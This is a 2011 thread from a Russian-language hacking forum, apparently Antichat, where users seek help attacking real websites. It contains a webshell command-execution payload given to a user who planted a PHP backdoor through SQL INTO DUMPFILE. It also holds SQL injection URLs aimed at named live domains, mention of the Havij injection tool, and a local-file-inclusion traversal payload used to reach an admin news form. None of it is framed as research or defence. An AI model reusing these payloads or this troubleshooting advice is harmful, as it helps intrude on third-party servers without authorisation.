 |
|
14.09.2011, 18:44
|
|
Новичок
Регистрация: 27.11.2009
Сообщений: 2
С нами:
8660137
Репутация:
0
|
|
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...
|
|
|
14.09.2011, 18:53
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от MyGreenLife
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...
php?commanda=system($_GET[console]);&console=ls -la
|
|
|
|
14.09.2011, 18:54
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от MyGreenLife
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo();
Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок?
Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =)
Спасибо ...
Боюсь спрашивать, но рискну:
Как ты залил бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
|
|
|
|
14.09.2011, 19:08
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от Tigger
Боюсь спрашивать, но рискну:
Как ты
залил
бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
полностью с тобой согласен!
некоторые много говорят не поделу!
|
|
|
|
14.09.2011, 19:17
|
|
Новичок
Регистрация: 27.11.2009
Сообщений: 2
С нами:
8660137
Репутация:
0
|
|
Сообщение от Tigger
Боюсь спрашивать, но рискну:
Как ты
залил
бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых.
Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
Я просто хотел узнать как можно найти доступные папки для записи, ибо бекдор можно залить и если нету прав на запись в диру. Например через модуль булки. За совет спасибо.
Сообщение от None
php?commanda=system($_GET[console]);&console=ls -la
Спасибо.
|
|
|
|
15.09.2011, 18:52
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Помогите со скулью:
http://nora-m.ru/index/2/product/220+order+by+1--
|
|
|
|
15.09.2011, 19:30
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
_http://wow.net.kg/^object=201388 нашел Cookie иньекцию,ввожу данные в Havij пишет что Target is vulnerable,уязвима,но..
Bypassing illegal union failed! Turning off this feature
Как решить ?
|
|
|
|
15.09.2011, 19:39
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
инклужу ее...
Сообщение от None
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
Вылазит форма добавления с actionом
поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
меняю action на
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
при добавление новости пишет "невозможно выполнить запрос".
Что еще можно попробовать сделать? |
|
|
|
15.09.2011, 20:50
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от vaddd
нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей...
инклужу ее...
Вылазит форма добавления с actionом
поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку.
меняю action на
http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml
при добавление новости пишет "невозможно выполнить запрос".
Что еще можно попробовать сделать?
скорей всего admnews.phtml инклюдит что-то еще, а так как ты инклюдишь этот скрипт с другой диры, то некоторые скрипты не подгружаются.
|
|
|
|
15.09.2011, 21:11
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
С нами:
8998242
Репутация:
2
|
|
Сообщение от Osstudio
Помогите со скулью:
http://nora-m.ru/index/2/product/220+order+by+1--
При http://nora-m.ru/index/2/product/220 тоже вылазит ошибка, так что, скорее всего в скрипте отсутствует уязвимость.
Пардон, ошибся.Пробуй blind инъекцию
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
